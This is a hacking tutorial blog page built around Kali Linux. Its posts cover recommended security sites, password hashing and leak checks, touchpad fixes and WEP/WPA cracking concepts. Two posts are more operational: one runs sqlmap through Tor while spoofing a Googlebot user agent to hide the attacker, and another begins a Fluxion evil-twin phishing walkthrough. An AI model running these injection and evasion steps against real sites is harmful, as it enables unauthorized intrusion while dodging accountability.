Click to Show/Hide Starters Guide
Recent Posts

Tuesday, October 11, 2016

Top 5 Websites to Master Hacking With Kali Linux : For Beginners

Despite writing so many tutorials on hacking with Kali Linux, I often get stuck and have to consult other resources. My blog has a lot of things but since I myself don't know everything, there's no way I can provide all the resources that you guys need. Here's a list of top 5 websites about hacking with Kali Linux that have enough resources to answer 99.9% of your queries, and have enough tutorials to teach you most of the stuff you need to know to get to a level where you can read the more complex stuff on any website.

5. Null Byte

Not dedicated to Kali, but to white hat hacking in general.

  • Lot of high quality content
  • Many content-creator / authors
  • Has a forum as well to ask questions
  • Active comments section
  • Not tailored to Kali
  • Navigation not very intuitive. Hard to find out stuff related to Kali.

4. Hacking-Tutorial

Very old website. Most websites in this list are fairly new, and probably didn't write tutorials for backtrack (Kali is what came after Backtrack 5 r3, instead of backtrack 6). However, this website was around before the time of Backtrack 5 R1 (when the the display manager was not started by default, and we had to use startx command just to get a GUI). 

  • Lot of high quality content
  • Mostly articles pertain to Kali Linux or Backtrack (the old posts). The backtrack ones will work with Kali without any changes in commands/procedure.
  • Only one author, so all posts are from one guy, means less low quality posts.
  • Design looks cluttered. Too many sharing widgets.
  • Only one author on this website, while it had it's advantage, there are disadvantages too. There's only so much good stuff one person can write.

3. Hacking Tutorials

Fairly new, pretty looking and frequently updated website.

  • The homepage is quite good and has posts organized by categories.
  • Content is high quality (I said this for every damn website I posted here, but then they made it to the list because of the high quality content).
  • Has many tutorials that you may not find on other websites (most sites have redundant tutorials, all the sites I've mentioned here will have a post about aircrack-ng, etc., but this site has some uncommon attacks and tools covered as well).
  • Not well organized content. You might end up reading something whose prerequisites you don't know and you can't understand what's going on in the tutorial.
  • Some very long posts doing stuff no one gives a rats ass about. Basically, lots of unnecessary content. I guess that comes as a side effect of having uncommon tutorials that won't be found on other websites. There's a reason why they aren't on most websites. It's because no is interested in reading them.

2. Black More Ops

Not limited to Kali Linux, has a lot of hacking tutorials.

  • While it's not limited to Kali, most of the content is focused on Kali
  • Again, lots of high quality content.
  • Navigation much easier
  • Some of the posts have nothing but a Youtube video, with no content to go along with it.
  • Some posts are news articles, instead of tutorials. Many people may not mind this, but some may.

1. Security Tube

This one has been around for ages too. However, it isn't providing any new free content anymore (but there's a lot of old content which is golden). The owner is now selling certified courses. (the creator is a badass, has written books, sells courses, discovered vulnerabilities and written attacks for WEP, etc.). 

  • Gold mine of resources if you're really interested in getting into hacking. No script kiddie stuff. The owner makes video tutorials and groups them up into megaprimers. Everything I know about wireless hacking I learnt from his wireless hacking megaprimer (the videos are free, the certification, if you want, will cost you).
  • I haven't stressed this enough, no script kiddie stuff. He actually has two assembly language megaprimers (again, free of cost).
  • Megaprimers are in very old operating systems, mostly backtrack 5.
  • Lets be honest, not everyone wants to watch 10 hours of video to learn the intricacies of hacking. Some are happy using tools and not caring about why or how they work. Unless you want to pursue a career in security, knowing how to use the tools would often be enough.
Despite the disadvantages, it's an awesome website. If you are really a security enthusiast, this is the go to site. All the other sites I've mentioned, as well as my blog, can't give you the in depth knowledge you can get from there. 

At last, I would stop pretending that I'm a selfless person who wants every one of his blog's visitor to go to his competitor websites. The last item on the list, my own blog (yay!)-

Bonus : Kali Tutorials

My hobby blog. I am the main content creator. Over time, many have contributed. In one accident, all content by two of my friends was lost, and I become the sole author again. Recently, another author has joined in, and there's two of us now, but I still have to do most of the posting.

  • Kali is our (mine really, but ours sounds so cool, almost like I have a team of authors) utmost priority. Only a few tutorials are there that aren't related to Kali
  • Tried my best to make the navigation nice, and order the posts so that beginners can read them in order of difficulty.
  • Homepage sucks
  • I am the only person who replies to comments, and sometimes I can't reply to all. So many queries go unanswered.
  • Site slow af.
  • Only two authors. The other author focuses on youtube videos so mainly it's just me. So, not a lot of regular content.

PS: I'm looking for people who are willing to write content, mail me at if you're interested.
PPS: Would love to edit advantages/disadvantages based on comments (especially for my blog, since review of one's own work is bound to be inaccurate and biased). Let me know how you feel. This article represents my personal views, and it'd be awesome to be able to incorporate a wider perspective on the basis of comments.

Sunday, September 18, 2016

Has your password been leaked?

Don't want to read the theory? Just want to see if your password has been leaked. Click here or scroll down.

How websites store data

When you create an account on a website, the website stores your registration details on it's SQL databases. Very few people, even within the company/website have direct access to the databases.

In a naive world, the database would contain your plaintext passwords. However, since there are hackers doing SQL injection attacks to dump the database data, it's helpful to keep the password hashed/ encrypted. This would mean that even if someone has access to the table, he would see your username, email address, and hashed password, but not the plain-text password.

Those who don't know about hashing may wonder how does the website check if you are typing the correct password during login, if the site itself doesn't know you password. Well, to understand that, you must understand what hashing is. You can read it up on wikipedia for a technical idea, but I'll (grossly over-)simplify it for you.

Hashing is any operation which is easy in one direction, and difficult in reverse. For example, mixing two colors is easy, while finding out the constituent colors of a color mixture isn't quite that easy. Multiplying two large (prime) numbers is easy, but given a huge prime number, it isn't easy to find the two prime factors which multiplied result in that number.
Hashing example

Let's say your password is "pass", and there's a hashing function f(x). Then, 
f("pass") = d@A2qAawqq21109 (say).
Going the forward way is quite simple. On the other hand, figuring out the plain-text password from the hash (d@A2qAawqq21109) is almost impossible.

So, when you create an account and you type the password as "pass", d@A2qAawqq21109 is stored in the database.When you login and type password as "pass", the server hashes it, and it becomes "d@A2qAawqq21109", which is matched with the SQL database. If you typed out some other password, say "ssap", then the hash generated would be different, and you won't be able to log in. Note that while the hashing function gives different outputs for most strings, every once in a while, there may be collisions (two strings may have the same hash). This is very very very rare, and shouldn't be of any concern to us.

Forgot Your Password - Ever wondered why almost all websites give you a new password when you forget your old one, instead of just telling you your password. Well, now you know, it turns out that they themselves don't know your password, and hence can't tell you. When they offer you a chance to change your password, they just change the corresponding hash in their tables, and now your new password works.

How hashes are cracked - I wrote earlier that hash functions are easy to go one way, but almost impossible to go the other. The task of going the other way can be accomplished by bruteforce method. Basically, suppose someone had the password "pass". Now, a hacker who only has access to the hashes can hash all the passwords in alphabetical order and then check which hash matches. (assume hacker knows password has length four and only alphabets). 
He tries 'aaaa','aaab', 'aaac',......'aaba', 'aabb' ,'aabc',.....'aazz' , 'abaa', ................ 'paaa','paab',.. ,'pass'. When he tries 'aaaa', the hash is not d@A2qAawqq21109, it is something else. Till he reaches 'pass', he gets a hash which doesn't match  d@A2qAawqq21109. But for 'pass', the hash matches. So, the hacker now knows your password.

Website leaks

Due to the above reason, website leaks are bad, but not that bad. If the passwords are sufficiently complex, the hashing algorithm is secure, and salt (explained later) is used, then it's quite unlikely that the hackers would be able to get many passwords from the database dump. So, even if Facebook DB is leaked, your passwords are most probably safe. Unfortunately, most probably is not something one can work with, especially when you have so much to loose in case the 0.1% chance of password being compromised is the one that materializes. So, after a DB leak, the website often asks all it's users to change their passwords (eg. dropbox leak, linkedin leak, myspace leak etc.). Also, since you might be using the same password on different websites, it's important that you change your password everywhere.

This isn't even the worst part though. Some websites don't hash your passwords, and store them in plain-text instead. If their database is leaked, the hacker has immediate access to millions of accounts on that website, plus possibly 10s of millions of accounts on other websites which use the same email/username - password combination.For example, 000webhost database had plain-text passwords, and it was leaked. I personally hosted a site there once, and my account was compromised as well. 

But this still isn't the worst part. The hackers often dump the databases publicly. The responsible ones let the website know that their security sucks, and asks them to inform their customers about the leak and get their passwords changed. After sufficient time is given to the website to act, the hacker would often dump the database publicly. To see the extent of this, take 000webhost's example. The first search result for "000webhost leak" gives you the database, which you can download and see the passwords. The password I was using 3-4 years ago is there in the database. That very password is probably still there on some of the websites that I signed up for 3-4 years ago but haven't you them since then (and hence didn't update the password). 

Problem 1 : Suppose there's an hashing scheme X. Under that scheme, "pass" becomes d@A2qAawqq21109. Now this is a very secure scheme and every website uses it. Now, there'a guy who has a lot of computational power and  he computes the hashes of all possible letter combinations under the scheme X. Now, given a hashed value, he can simply lookup/search his table and see what password does it correspond to. He makes this table of word to hash available online. Now, it's quite easy to get the passwords from a database dump. 

Problem 2 : Alternatively, even if the scheme isn't common, what one can do is that he can take a common password, say "password", then hash it, and then search all the users in the 100 million users password dump and see if any hash matches. If it does, then that means that the given user has the password "password". By using 1 million common password, he'll probably get 10% of the users password among the 100 million users.

Solution : Hashing Salt - To prevent that, each user chooses a password, and is given a random string, the hashing salt. The hashing function operates on both the password and the salt. So, if two users have same password, but different salts, then they'll have different hashes. This renders both the above techniques/problems useless. Now, to get the correct hash, the hacker has to input the correct password and the correct salt to the hashing function. This means that -

  1. The first problem where someone else pre-computed the password-hash table is solved, since now that person has to make password-salt-hash table (for every password and every salt combination, what's the hash), which is going to be too many possible combinations. If there are 10 million possible passwords, and 10 million possible salts, there would be 100 million million combinations (I don't even know what million million even is). If there are 10 common salts which are used very often, then the person can make a table with all the 10 million passwords hashed for the 10 common salts. Alternatively, the person can hash the 10 most common password with 10 million possible hashes. Thus, it's important to have both strong passwords and random salts.
  2. The second problem is also kind of solved, since the person would have to solve the hash of common passwords with each salt in the table (note that he doesn't have to do it for all 10 million combinations, only the ones present in the table). Again, not using easy generic password like "password","hello", etc. would solve this issue.

Weak salts? One of the flaws with hashing is that it could have weak salts. WPA/WPA-2 is quite robust, but since it used the SSID of the network as salt, the routers which use default SSID's ("linksys","netgear",etc.) are more vulnerable than others since rainbow tables exist which have hashes for most common passwords and most common SSIDs. That said, I'd like to re-iterate, WPA/WPA-2 is still quite damn secure, and I pointed this out only as a relevant example.

Are you compromised?

Out of all the leaks so far, I had accounts in 4 of the leaks. My account was there in the Myspace leak, the LinkedIn leak, the dropbox leak, and the 000webhost leak. I had to change my password on multiple sites on multiple occasions. 

One way to find out if you're compromised is to look for all the dumps and check manually if you're in them. However, that's practically impossible (not all dumps are public, and looking for your name/email in a huge file takes the computer more time than you'd guess). Fortunately, there's a website which specifically exists for this purpose, known as LeakedSource. You can search using your email free of cost. They offer some extra functionality for pretty affordable rates ($4 paypal, $2 bitcoin). 

I am compromised

If you find out that your account is indeed compromised, then I suggest you quickly change your password on all services that you use which have the same password. Better yet, change all your passwords. It's good practice to keep changing your passwords regularly anyway. Also, if a website has the two step authentication feature, then it's suggested that you use it.

Sunday, September 11, 2016

Kali Linux : Touchpad issues - tapping, reverse/natural scrolling

Since I've started using Kali Linux, I have often encountered problems with my touchpad. The problem can either be with tapping (tapping the touchpad doesn't result in a click, and I have to press the physical button), or with scrolling (two finger scrolling doesn't work).

I have come across the following 3 fixes. At least one of them should work for you-

Fix 1: Easiest - GUI setting

This fix requires no fancy commands. You just have to go to Mouse & Touchpad settings and make appropriate changes. To go to the settings, you can either-
  • Press the windows key (on the lower bottom, Ctrl key, Function key, Windows key, Alt key), and type mouse in the search bar that shows up.
  • Click the activities button on the top left, and type mouse in the search bar that shows up.

Now, you should see something like this-

You can check the tap to click and two finger scroll options and your problem is solved.

If, however, you see something like this-

Then you have to use the next fixes, as the Mouse and Touchpad setting are useless for you.

Fix 2 : Tapping and reverse Scroll

If you are able to scroll just fine, but your touchpad is not registering the taps, then just type this command into the terminal-
synclient tapbutton1=1
This should enable tapping for you.

In my case, I had scrolling working without any problems, but I prefer natural scrolling, and that option wasn't there for me in mouse & touchpad settings. However, if you type synclient into the terminal, you see something like this-

    Parameter settings:
        LeftEdge                = 1618
        RightEdge               = 5366
        TopEdge                 = 1356
        BottomEdge              = 4536
        FingerLow               = 25
        FingerHigh              = 30
        MaxTapTime              = 180
        MaxTapMove              = 251
        MaxDoubleTapTime        = 100
        SingleTapTimeout        = 180
        ClickTime               = 100
        EmulateMidButtonTime    = 75
        EmulateTwoFingerMinZ    = 282
        EmulateTwoFingerMinW    = 7
        VertScrollDelta         = 114
        HorizScrollDelta        = 114
        VertEdgeScroll          = 0
        HorizEdgeScroll         = 0
        CornerCoasting          = 0
        VertTwoFingerScroll     = 1
        HorizTwoFingerScroll    = 0
        MinSpeed                = 1
        MaxSpeed                = 1.75
        AccelFactor             = 0.035014
        TouchpadOff             = 0
        LockedDrags             = 0
        LockedDragTimeout       = 5000
        RTCornerButton          = 0
        RBCornerButton          = 0
        LTCornerButton          = 0
        LBCornerButton          = 0
        TapButton1              = 1
        TapButton2              = 0
        TapButton3              = 0
        ClickFinger1            = 1
        ClickFinger2            = 1
        ClickFinger3            = 1
        CircularScrolling       = 0
        CircScrollDelta         = 0.1
        CircScrollTrigger       = 0
        CircularPad             = 0
        PalmDetect              = 0
        PalmMinWidth            = 10
        PalmMinZ                = 200
        CoastingSpeed           = 20
        CoastingFriction        = 50
        PressureMotionMinZ      = 30
        PressureMotionMaxZ      = 160
        PressureMotionMinFactor = 1
        PressureMotionMaxFactor = 1
        GrabEventDevice         = 0
        TapAndDragGesture       = 1
        AreaLeftEdge            = 0
        AreaRightEdge           = 0
        AreaTopEdge             = 0
        AreaBottomEdge          = 0
        HorizHysteresis         = 28
        VertHysteresis          = 28
        ClickPad                = 0

You can quickly notice the VertScrollDelta (delta usually refers to rate of change, here speed of scrolling) parameter which for me is set to 114. I decided to check if making it -114 would make it scroll at the same speed but in the opposite direction. To test that, I tried the following command-
synclient VertScrollDelta=-114
And turns out I was right and it did reverse the direction of scrolling.

Little problem

These changes that we made aren't persistent, and the synclient setting would revert to default every time you start your system again. There are many solutions to this, one of which include editing files in /usr/share/X11/xorg.conf.d/. However, these files tend to get overwritten and we have to deal with a lot of other mess to fix that behavior.

Instead, we will use a very simple solution, and just run the above two commands on system startup.

Add the commands to startup

Step 1 : Navigate to the .config directory
cd ~/.config/
Step 2 : Check if autostart folder exists
Step 3: If it doesn't exist, create the folder. If it exists, skip this step
mkdir autostart
Step 4: Navigate to autostart folder
cd autostart
Step 5: Use your favorite text editor [vim v/s/ sublime text?] (or cat ). I'm using leafpad to make things look less intimidating.
leafpad script.desktop
Step 6: A leafpad windows will pop up. Paste one of the following into the window and then save and then close leafpad.
If you are logged in as root (probably the case)
[Desktop Entry]

If you are logged in as another user (if you created a non-superuser account)
[Desktop Entry]
Exec=/home/<name here>/

Note 1 : To find the <name here> in second case, just navigate to home (cd ~) and find present working directory (pwd)
Note 2 : (If you're curious why I didn't use ~ and instead made two different scripts for root and other users) Exec=~/ didn't work for me. Maybe it does work in general, and there was some other factor in play for me, or maybe it isn't supposed to work at all. Not sure. Any comments in this regard are welcome.

Step 7: Change directory to home.
cd ~
Step 8: Create a file called
Step 9: Paste the following code into it. Then save.

synclient tapbutton1=1 #To enable tapping
synclient VertScrollDelta=-114 #To reverse direction of scroll
PS: Paste only the lines required by you.

Step 10: Make it executable
chmod 777
chmod a+x
Restart Kali and see if your tapping and reverse scroll are still working. If not, go through the steps again and see what you missed. Everything is case sensitive so you have to be very careful in that regard.


If typing the commands into the terminal worked for you, but automation by adding the commands to startup didn't, then here is one simple troubleshooting tip to isolate the problem.

Open a terminal and type
If your tapping/reverse scrolling is working fine now, then your script is fine, but the autostart directory content is not. Recheck steps 1 to 6.
If your tapping/reverse scrolling isn't working fine, then your script is flawed. Recheck step 7 to 10.

Fix 3 : modprobe method

I found out about this method here. It did fix a few things for me, but like the second reply on the thread, what happened with me was- 

Earlier my scroll was working and tap to click wasn't
After running the commands
Tap to click started working and two finger scroll stopped working

Also, even when my scroll was working it wasn't natural scroll and that's a bit inconvenient for me. So, Fix 2 above was the best fix for me. However, I've included this fix because it seems to work with most people. So here it is- 

Step 1 : Open a terminal. 
Step 2 : Type the following command. Your mouse pointer will stop working after typing the first command and will resume continue working (hopefully with the touchpad problems solved) after the second.
modprobe -r psmouse 
modprobe psmouse proto=imps


Follow these steps-

Step 1 : Navigate to required directory
cd /etc/modprobe.d/
Step 2 : Open text editor
leafpad whatever.conf
Step 3:  Paste this-
options psmouse proto=imps

Step 4: Save and exit

Restart and see if the changes are persistent. 

Again, I reiterate, this method is based on a fix I found on Kali Forums, and you should read further there if you are facing any problems.

That said, if you are facing any problems, then feel free to comment. If you followed the guide but had to do something a bit different to get it working, then also comment, as it may help others.

Friday, September 9, 2016

Things You Should Know : Wireless Hacking Intermediate

In the previous post in the 'things you should know' series I discussed Wireless Hacking basics. It's recommended that you go through it before starting this tutorial.


You should know (all this is covered in Wireless Hacking basics)-
  • What are the different flavors of wireless networks you'll encounter and how difficult it is to hack each of them.
  • What are hidden networks, and whether they offer a real challenge to a hacker.
  • Have a very rough idea how each of the various 'flavors' of wireless networks is actually hacked.


You will know -
  • Know even more about different flavors of wireless networks.
  • How to go about hacking any given wireless network.
  • Common tools and attacks that are used in wireless hacking.

The last two points would be covered in detail in the coming posts. A rough idea about the cryptographic aspects of the attacks, the vulnerabilities and the exploits. A rough idea about the cryptographic aspects of each 'flavor' of wireless network security.

Pirates of the Caribbean

Suppose you are in ship manufacturing business. These are times when pirates were rampaging the seas. You observed how the merchant ships are all floating unguarded in the seas, and the pirate industry is booming because of easy targets. You decide to create fortified ships, which can defend themselves against the pirates. For this, you use an alloy X. Your idea was appreciated by merchants and everyone started using your ships....
The most iconic pirates of modern times

Unfortunately, your happiness was short lived. Soon, the pirates found out flaws in your ships and any pirate who knew what he was doing could easily get past your ship's defense mechanisms. For a while you tried to fix the known weaknesses in the ship, but soon realized that there were too many problems, and that the very design of the ship was flawed.

You knew what flaws the pirates were exploiting, and could build a new and stronger ship. However, the merchants weren't willing to pay for new ships. You then found out that by remodeling some parts of the ship in a very cost efficient way, you could make the ship's security almost impenetrable. In the coming years, some pirates found a few structural weaknesses in alloy X, and some issues with the core design of the ship (remnant weaknesses of the original ship). However, these weaknesses were rare and your customers were overall happy.

After some time you decided to roll out an altogether new model of the ship. This time, you used a stronger allow, Y. Also, you knew all the flaws in the previous versions of the ship, and didn't make any errors in the design this time. Finally, you had a ship which could withstand constant bombardment for months on end, without collapsing. There was still scope for human error, as the sailors can sometimes be careless, but other than that, it was an invincible ship.

WEP, WPA and WPA-2

WEP is the flawed ship in the above discussion. The aim of Wireless Alliance was to write an algorithm to make wireless network (WLAN) as secure as wired networks (LAN). This is why the protocol was called Wired Equivalent Privacy (privacy equivalent to the one expected in a traditional wired network). Unfortunately, while in theory the idea behind WEP sounded bullet-proof, the actual implementation was very flawed. The main problems were static keys and weak IVs. For a while attempts were made to fix the problems, but nothing worked well enough(WEP2, WEPplus, etc. were made but all failed).

WPA was a new WLAN standard which was compatible with devices using WEP encryption. It fixed pretty much all the flaws in WEP encryption, but the limitation of having to work with old hardware meant that some remnants of the WEPs problems would still continue to haunt WPA. Overall, however, WPA was quite secure. In the above story, this is the remodeled ship.

WPA-2 is the latest and most robust security algorithm for wireless networks. It wasn't backwards compatible with many devices, but these days all the new devices support WPA-2. This is the invincible ship, the new model with a stronger alloy.

But wait...

In last tutorial I assumed WPA and WPA-2 are the same thing. In this one, I'm telling you they are quite different. What's the matter?

Well actually, the two standards are indeed quite different. However, while it's true there are some remnant flaws in WPA that are absent in WPA-2, from a hacker's perspective, the technique to hack the two networks is often the same. Why?
  • Very few tools exist which carry out the attacks against WPA networks properly (the absence of proof-of-concept scripts means that you have to do everything from scratch, which most people can't).
  • All these attacks work only under certain conditions (key renewal period must be large, QoS must be enabled, etc.)
Because of these reasons, despite WPA being a little less secure than WPA-2, most of the time, a hacker has to use brute-force/dictionary attack and other methods that he would use against WPA-2, practically making WPA and WPA-2 the same thing from his perspective.

PS: There's more to the WPA/WPA-2 story than what I've captured here. Actually WPA or WPA-2 are ambiguous descriptions, and the actual intricacy (PSK, CCMP, TKIP, X/EAP, AES w.r.t. cipher used and authentication used) would required further diving into personal and enterprise versions of WPA as well as WPA-2.

How to Hack

Now that you know the basics of all these network, let's get to how actually these networks are hacked. I will only name the attacks, further details would be provided in coming tutorials-

The Initialization vector v passed to the RC4 cipher is the
weakness of WEP

Most of the attacks rely on inherent weaknesses in IVs (initialization vectors). Basically, if you collect enough of them, you will get the password.
  1. Passive method
    • If you don't want to leave behind any footprints, then passive method is the way to go. In this, you simply listen to the channel on which the network is on, and capture the data packets (airodump-ng). These packets will give you IVs, and with enough of these, you can crack the network (aircrack-ng). I already have a tutorial on this method, which you can read here - Hack WEP using aircrack-ng suite.
  2. Active methods
    • ARP request replayThe above method can be incredibly slow, since you need a lot of packets (there's no way to say how many, it can literally be anything due the nature of the attack. However, usually the number of packets required ends up in 5 digits). Getting these many packets can be time consuming. However, there are many ways to fasten up the process. The basic idea is to initiate some sort of conversation in the network, and then capture the packets that arise as a result of the conversation. The problem is, not all packets have IVs. So, without having the password to the AP, you have to make it generate packets with IVs. One of the best ways to do this is by requesting ARP packets (which have IVs and can be generated easily once you have captured at least one ARP packet). This attack is called ARP replay attack. We have a tutorial for this attack as well, ARP request replay attack.
    • Chopchop attack
    • Fragmentation attack
    • Caffe Latte attack
I'll cover all these attacks in detail separately (I really can't sumarrize the bottom three). Let's move to WPA-

WPA-2 (and WPA)

There are no vulnerabilities here that you can easily exploit. The only two options we have are to guess the password or to fool a user into giving us the password.

  1. Guess the password - For guessing something, you need two things : Guesses (duh) and validation. Basically, you need to be able to make a lot of guess, and also be able to verify if they are correct or not. The naive way would be to enter the guesses into the password field that your OS provides when connecting to the wifi. That would be slow, since you'd have to do it manually. Even if you write a script for that, it would take time since you have to communicate with the AP for every guess(that too multiple times for each guess). Basically, validation by asking the AP every time is slow. So, is there a way to check the correctness of our password without asking the AP? Yes, but only if you have a 4-way handshake. Basically, you need the capture the series of packets transmitted when a valid client connects to the AP. If you have these packets (the 4-way handshake), then you can validate your password against it. More details on this later, but I hope the abstract idea is clear. There are a few different ways of guessing the password :-
    • Bruteforce - Tries all possible passwords. It is guaranteed that this will work, given sufficient time. However, even for alphanumeric passwords of length 8, bruteforce takes incredibly long. This method might be useful if the password is short and you know that it's composed only of numbers.
    • Wordlist/Dictionary - In this attack, there's a list of words which are possible candidates to be the password. These word list files contains english words, combinations of words, misspelling of words, and so on. There are some huge wordlists which are many GBs in size, and many networks can be cracked using them. However, there's no guarantee that the network you are trying to crack would have it's password in the list. These attacks get completed within a reasonable timeframe.
    • Rainbow table - The validation process against the 4-way handshake that I mentioned earlier involves hashing of the plaintext password which is then compared with the hash in handshake. However, hashing (WPA uses PBKDF2) is a CPU intensive task and is the limiting factor in the speed at which you can test keys (this is the reason why there are so many tools which use GPU instead of CPU to speed up cracking). Now, a possible solution to this is that the person who created the wordlist/dictionary that we are using can also convert the plaintext passwords into hashes so that they can be checked directly. Unfortunately, WPA-2 uses a salt while hashing, which means that two networks with the same password can have different hashing if they use different salts. How does WPA-2 choose the salt? It uses the network's name (SSID) as the salt. So two networks with the same SSID and the same password would have the same salt. So, now the guy who made the wordlist has to create separate hashes for all possible SSID's. Practically, what happens is that hashes are generated for the most common SSID's (the default one when a router is purchases like -linksys, netgear, belkin, etc.). If the target network has one of those SSID's then the cracking time is reduced significantly by using the precomputed hashes. This precomputed table of hashes is called rainbow table. Note that these tables would be significantly larger than the wordlists tables. So, while we saved ourselves some time while cracking the password, we had to use a much larger file (some are 100s of GBs) instead of a smaller one. This is referred to as time-memory tradeoff. This page has rainbow tables for 1000 most common SSIDs.
  2. Fool a user into giving you the password - Basically this just a combination of Man in the middle attacks and social engineering attacks. More specifically, it is a combination of evil twin and phishing. In this attack, you first force a client to disconnect from the original WPA-2 network, then force him to connect to a fake open network that you create, and then send him a login page in his browser where you ask him to enter the password of the network. You might be wondering, why do we need to keep the network open and then ask for the password in the browser (can't we just create a WPA-2 network and let the user give us the password directly). The answer to this lies in the fact that WPA-2 performs mutual authentication during the 4-way handshake. Basically, the client verifies that the AP is legit, and knows the password, and the AP verifies that the client is legit and knows the password (throughout the process, the password is never sent in plaintext). We just don't have the information necessary enough to complete the 4-way handshake.
  3. Bonus : WPS vulnerability and reaver [I have covered it in detail seperately so not explaining it again (I'm only human, and a very lazy one too)]
The WPA-2 4 way handshake procedure. Both AP and the client authenticate each other

Tools (Kali)

In this section I'll name some common tools in the wireless hacking category which come preintalled in Kali, along with the purpose they are used for.
  1. Capture packets
    • airodump-ng 
    • wireshark (really versatile tool, there are books just covering this tool for packet analysis)
  2. Crack handshakes
  3. WPS
    • reaver
    • pixiewps (performs the "pixie dust attack")
  4. Cool tools
  5. Automation
    • wifite
    • fluxion (actually it isn't a common script at all, but since I wrote a tutorial on it, I'm linking it)
You can find more details about all the tools installed on Kali Tools page.

Okay guys, this is all that I had planned for this tutorial. I hope you learnt a lot of stuff. Will delve into further depths in coming tutorials.

Saturday, September 3, 2016

SQLMap with Tor for Anonymity

In a previous tutorial, I had demonstrated how to use SqlMap to carry out Sql Injection on a website. In this tutorial, I will show you how to use Tor to add a layer of obscurity between you and the target website.

Installing Tor

Getting tor for Kali Linux is as simple as typing a single line in the terminal-
apt-get instal tor
If you have any problems installing, then do an apt-get update first.

Start Tor

This is also quite simple
You'll see something like this-

    Sep 04 02:41:25.806 [notice] Tor v0.2.8.7 (git-cc2f02ef17899f86) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.2h and Zlib 1.2.8.
    Sep 04 02:41:25.806 [notice] Tor can't help you if you use it wrong! Learn how to be safe at
    Sep 04 02:41:25.806 [notice] Read configuration file "/etc/tor/torrc".
    Sep 04 02:41:25.811 [notice] Opening Socks listener on
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
    Sep 04 02:41:26.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
    Sep 04 02:41:26.000 [notice] Bootstrapped 0%: Starting
    Sep 04 02:41:27.000 [notice] Bootstrapped 5%: Connecting to directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
    Sep 04 02:41:27.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
    Sep 04 02:41:28.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
    Sep 04 02:41:29.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
    Sep 04 02:41:30.000 [notice] Bootstrapped 40%: Loading authority key certs
    Sep 04 02:41:30.000 [notice] Bootstrapped 45%: Asking for relay descriptors
    Sep 04 02:41:30.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7117, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
    Sep 04 02:41:31.000 [notice] Bootstrapped 50%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 55%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 61%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 66%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 73%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 78%: Loading relay descriptors
    Sep 04 02:41:35.000 [notice] Bootstrapped 80%: Connecting to the Tor network
    Sep 04 02:41:36.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
    Sep 04 02:41:38.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
    Sep 04 02:41:38.000 [notice] Bootstrapped 100%: Done
Important: Don't close this terminal. Open a new terminal for further steps.

Testing with Sqlmap

Use this command
sqlmap -u --tor --tor-type=SOCKS5

If you want a text version:-

    ___ ___| |_____ ___ ___ {}
    |_ -| . | | | .'| . |
    |___|_ |_|_|_|_|__,| _|
    |_| |_|

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 02:47:02

    [02:47:02] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
    [02:47:02] [INFO] setting Tor SOCKS proxy settings
    [02:47:02] [INFO] testing connection to the target URL
    [02:47:03] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [02:47:04] [INFO] testing if the target URL is stable
    [02:47:06] [INFO] target URL is stable
    [02:47:06] [INFO] testing if GET parameter 'cat' is dynamic
    [02:47:07] [INFO] confirming that GET parameter 'cat' is dynamic

Additional obscurity

Google's crawlers often visit websites, and are one of the least suspicious entities in the website's logs. We can use that to our advantage. Use this command to pretend to be googleBot.
sqlmap -u --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +"
 This is what you would see.

At this point, you are going to look like a google bot, and your IP would be that of some Tor exit node. This should be enough for most purposes.

This is all I had in mind for this tutorial. I urge you not to assume that using Tor means you can do illegal stuff and get away with it. This tutorial is written only for educational purposes.

Thursday, August 25, 2016

Hacking WPA/WPA2 without dictionary/bruteforce : Fluxion

Fluxion (linset)

I hadn't ventured into Hackforums since a while, and this time when I went there I saw a thread about a script called Fluxion. It's based on another script called linset (actually it's no much different from linset, think of it as an improvement, with some bug fixes and additional options). I did once think about (and was asked in a comment about) using something like a man in the middle attack/ evil twin attack to get WPA password instead of going the bruteforce/dictionary route, but never looked the idea up on the internet nor spent much time pondering over it. However, once I saw the thread about this cool script, I decided to give it a try. So in this post I'll show you how I used Fluxion, and how you can too.
Disclaimer : Use this tool only on networks you own .Don't do anything illegal.


  • Checking if tool is pre-installed, getting it via github if it isn't.
  • Running the script, installing dependencies if required.
  • Quick overview of how to use Fluxion.
  • Detailed walk-through and demonstration with text explanation and screenshots
  • Video demonstration (not identical to the written demo, but almost the same)
  • Troubleshooting section

Just double checking

The first thing I did was make sure that Kali doesn't already have this tool. Maybe if you are reading this post a long time after it was written, then you might have the tool pre-installed in Kali. In any case, try this out:
I, personally tried to check if linset or fluxion came pre-installed in Kali (though I didn't expect them to be there).

Getting the script

Getting the script is just a matter of cloning the github repository. Just use the git command line tool to do it.
git clone
If you have any problems with this step, then you can just naviagate to the repostitory and manually download the stuff.

There are 4 dependencies that need to be installed

Running the script

Just navigate to the fluxion directory or the directory containing the scripts in case you downloaded them manually. If you are following the terminal commands I'm using, then it's just a simple change directory command for you:
